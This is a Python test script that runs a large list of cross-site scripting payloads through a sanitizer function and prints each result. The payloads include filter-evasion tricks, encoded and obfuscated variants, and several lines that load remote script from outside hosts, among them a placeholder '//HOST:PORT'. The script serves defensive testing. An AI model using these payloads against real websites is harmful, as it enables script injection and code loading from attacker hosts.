import inputSanitizer as ips

payloads = [
    r'<script>alert(\'XSS\')</script>',
    r'<scr<script>ipt>alert(\'XSS\')</scr<script>ipt>',
    r'"><script>alert(\'XSS\')</script>',
    r'"><script>alert(String.fromCharCode(88,83,83))</script>',
    r'<img src=x onerror=alert(\'XSS\');>',
    r'<img src=x onerror=alert(String.fromCharCode(88,83,83));>',
    r'<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>',
    r'<img src=x:alert(alt) onerror=eval(src) alt=xss>',
    r'"><img src=x onerror=alert(\'XSS\');>',
    r'"><img src=x onerror=alert(String.fromCharCode(88,83,83));>',
    r'<svg\x0Conload=alert(1)>',
    r'<svg/onload=alert(\'XSS\')>',
    r'<svg/onload=alert(String.fromCharCode(88,83,83))>',
    r'<svg id=alert(1) onload=eval(id)>',
    r'"><svg/onload=alert(String.fromCharCode(88,83,83))>',
    r'"><svg/onload=alert(/XSS/)>',
    r'<body onload=alert(/XSS/.source)>',
    r'<input autofocus onfocus=alert(1)>',
    r'<select autofocus onfocus=alert(1)>',
    r'<textarea autofocus onfocus=alert(1)>',
    r'<keygen autofocus onfocus=alert(1)>',
    r'<video/poster/onerror=alert(1)>',
    r'<video><source onerror="javascript:alert(1)">',
    r'<video src=_ onloadstart="alert(1)">',
    r'<details/open/ontoggle="alert`1`">',
    r'<audio src onloadstart=alert(1)>',
    r'<marquee onstart=alert(1)>',
    r'<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">',
    r'<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>',
    r'data:text/html,<script>alert(0)</script>',
    r'data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+',
    r'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e',
    r'"><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>\'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>\'"><img src="http: //i.imgur.com/P8mL8.jpg">',
    r'" onclick=alert(1)//<button \' onclick=alert(1)//> */ alert(1)//',
    r'\';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">\'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>',
    r'javascript://\'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*',
    r'javascript://--></script></title></style>"/</textarea>*/<alert()/*\' onclick=alert()//>a',
    r'javascript://</title>"/</script></style></textarea/-->*/<alert()/*\' onclick=alert()//>/',
    r'javascript://</title></style></textarea>--></script><a"//\' onclick=alert()//>*/alert()/*',
    r'javascript://\'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*',
    r'javascript://</title></textarea></style></script --><li \'//" \'*/alert()/*\', onclick=alert()//',
    r'javascript:alert()//--></script></textarea></style></title><a"//\' onclick=alert()//>*/alert()/*',
    r'--></script></title></style>"/</textarea><a\' onclick=alert()//>*/alert()/*',
    r'/</title/\'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*',
    r'javascript://--></title></style></textarea></script><svg "//\' onclick=alert()//',
    r'/</title/\'/</style/</script/--><p" onclick=alert()//>*/alert()/*',
    r'<object onafterscriptexecute=confirm(0)>',
    r'<object onbeforescriptexecute=confirm(0)>',
    r'<script>window[\'alert\'](document[\'domain\'])<script>',
    r'<img src=\'1\' onerror/=alert(0) />',
    r'<script>window[\'alert\'](0)</script>',
    r'<script>parent[\'alert\'](1)</script>',
    r'<script>self[\'alert\'](2)</script>',
    r'<script>top[\'alert\'](3)</script>',
    r'"><svg onload=alert(1)//',
    r'"onmouseover=alert(1)//',
    r'"autofocus/onfocus=alert(1)//',
    r'\'-alert(1)-\'',
    r'\'-alert(1)//',
    r'\\\'-alert(1)//',
    r'</script><svg onload=alert(1)>',
    r'<x contenteditable onblur=alert(1)>lose focus!',
    r'<x onclick=alert(1)>click this!',
    r'<x oncopy=alert(1)>copy this!',
    r'<x oncontextmenu=alert(1)>right click this!',
    r'<x oncut=alert(1)>cut this!',
    r'<x ondblclick=alert(1)>double click this!',
    r'<x ondrag=alert(1)>drag this!',
    r'<x contenteditable onfocus=alert(1)>focus this!',
    r'<x contenteditable oninput=alert(1)>input here!',
    r'<x contenteditable onkeydown=alert(1)>press any key!',
    r'<x contenteditable onkeypress=alert(1)>press any key!',
    r'<x contenteditable onkeyup=alert(1)>press any key!',
    r'<x onmousedown=alert(1)>click this!',
    r'<x onmousemove=alert(1)>hover this!',
    r'<x onmouseout=alert(1)>hover this!',
    r'<x onmouseover=alert(1)>hover this!',
    r'<x onmouseup=alert(1)>click this!',
    r'<x contenteditable onpaste=alert(1)>paste here!',
    r'<script>alert(1)//',
    r'<script>alert(1)<!–',
    r'<script src=//brutelogic.com.br/1.js>',
    r'<script src=//3334957647/1>',
    r'%3Cx onxxx=alert(1)',
    r'<%78 onxxx=1',
    r'<x %6Fnxxx=1',
    r'<x o%6Exxx=1',
    r'<x on%78xx=1',
    r'<x onxxx%3D1',
    r'<X onxxx=1',
    r'<x OnXxx=1',
    r'<X OnXxx=1',
    r'<x onxxx=1 onxxx=1',
    r'<x/onxxx=1',
    r'<x%09onxxx=1',
    r'<x%0Aonxxx=1',
    r'<x%0Conxxx=1',
    r'<x%0Donxxx=1',
    r'<x%2Fonxxx=1',
    r'<x 1=\'1\'onxxx=1',
    r'<x 1="1"onxxx=1',
    r'<x </onxxx=1',
    r'<x 1=">" onxxx=1',
    r'<http://onxxx%3D1/',
    r'<x onxxx=alert(1) 1=\'',
    r'<svg onload=setInterval(function(){with(document)body.appendChild(createElement(\'script\')).src=\'//HOST:PORT\'},0)>',
    r'\'onload=alert(1)><svg/1=\'',
    r'\'>alert(1)</script><script/1=\'',
    r'*/alert(1)</script><script>/*',
    r'*/alert(1)">\'onload="/*<svg/1=\'',
    r'`-alert(1)">\'onload="`<svg/1=\'',
    r'*/</script>>alert(1)/*<script/1=\'',
    r'<script>alert(1)</script>',
    r'<script src=javascript:alert(1)>',
    r'<iframe src=javascript:alert(1)>',
    r'<embed src=javascript:alert(1)>',
    r'<a href=javascript:alert(1)>click',
    r'<math><brute href=javascript:alert(1)>click',
    r'<form action=javascript:alert(1)><input type=submit>',
    r'<isindex action=javascript:alert(1) type=submit value=click>',
    r'<form><button formaction=javascript:alert(1)>click',
    r'<form><input formaction=javascript:alert(1) type=submit value=click>',
    r'<form><input formaction=javascript:alert(1) type=image value=click>',
    r'<form><input formaction=javascript:alert(1) type=image src=SOURCE>',
    r'<isindex formaction=javascript:alert(1) type=submit value=click>',
    r'<object data=javascript:alert(1)>',
    r'<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>',
    r'<svg><script xlink:href=data:,alert(1) />',
    r'<math><brute xlink:href=javascript:alert(1)>click',
    r'<svg><a xmlns:xlink=http://www.w3.org/1999/xlink xlink:href=?><circle r=400 /><animate attributeName=xlink:href begin=0 from=javascript:alert(1) to=&>',
    r'<html ontouchstart=alert(1)>',
    r'<html ontouchend=alert(1)>',
    r'<html ontouchmove=alert(1)>',
    r'<html ontouchcancel=alert(1)>',
    r'<body onorientationchange=alert(1)>',
    r'"><img src=1 onerror=alert(1)>.gif',
    r'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>',
    r'GIF89a/*<svg/onload=alert(1)>*/=alert(document.domain)//;',
    r'<script src="data:&comma;alert(1)//',
    r'"><script src=data:&comma;alert(1)//',
    r'<script src="//brutelogic.com.br&sol;1.js&num;',
    r'"><script src=//brutelogic.com.br&sol;1.js&num;',
    r'<link rel=import href="data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;',
    r'"><link rel=import href=data:text/html&comma;&lt;script&gt;alert(1)&lt;&sol;script&gt;',
    r'<base href=//0>',
    r'<script/src="data:&comma;eval(atob(location.hash.slice(1)))//#alert(1)',
    r'<body onload=alert(1)>',
    r'<body onpageshow=alert(1)>',
    r'<body onfocus=alert(1)>',
    r'<body onhashchange=alert(1)><a href=#x>click this!#x',
    r'<body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x',
    r'<body onscroll=alert(1)><br><br><br><br>',
    r'<body onresize=alert(1)>press F12!',
    r'<body onhelp=alert(1)>press F1! (MSIE)',
    r'<marquee onstart=alert(1)>',
    r'<marquee loop=1 width=0 onfinish=alert(1)>',
    r'<audio src onloadstart=alert(1)>',
    r'<video onloadstart=alert(1)><source>',
    r'<input autofocus onblur=alert(1)>',
    r'<keygen autofocus onfocus=alert(1)>',
    r'<form onsubmit=alert(1)><input type=submit>',
    r'<select onchange=alert(1)><option>1<option>2',
    r'<menu id=x contextmenu=x onshow=alert(1)>right click me!',
    r'<script>\u0061\u006C\u0065\u0072\u0074(1)</script>',
    r'<img src="1" onerror="&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;" />',
    r'<iframe src="javascript:%61%6c%65%72%74%28%31%29"></iframe>',
    r'<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>',
    r'<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>',
    r'<img src=1 alt=al lang=ert onerror=top[alt+lang](0)>',
    r'<script>$=1,alert($)</script>',
    r'<script ~~~>confirm(1)</script ~~~>',
    r'<script>$=1,\u0061lert($)</script>',
    r'<</script/script><script>eval(\'\\u\'+\'0061\'+\'lert(1)\')//</script>',
    r'<</script/script><script ~~~>\u0061lert(1)</script ~~~>',
    r'</style></scRipt><scRipt>alert(1)</scRipt>',
    r'<img/id="alert&lpar;&#x27;XSS&#x27;&#x29;\"/alt=\"/\"src=\"/\"onerror=eval(id&#x29;>',
    r'<img src=x:prompt(eval(alt)) onerror=eval(src) alt=String.fromCharCode(88,83,83)>',
    r'<svg><x><script>alert&#40;&#39;1&#39;&#41</x>',
    r'<iframe src=""/srcdoc=\'&lt;svg onload&equals;alert&lpar;1&rpar;&gt;\'>'
]


print("--- xssSanitize test ediliyor ---\n")
for payload in payloads:
    try:
        sonuc = ips.xssSanitize(payload)
        print(f"Payload: {payload!r} => Sanitized Output: {sonuc}")
    except Exception as e:
        print(f"Payload: {payload!r} => Error: {e}")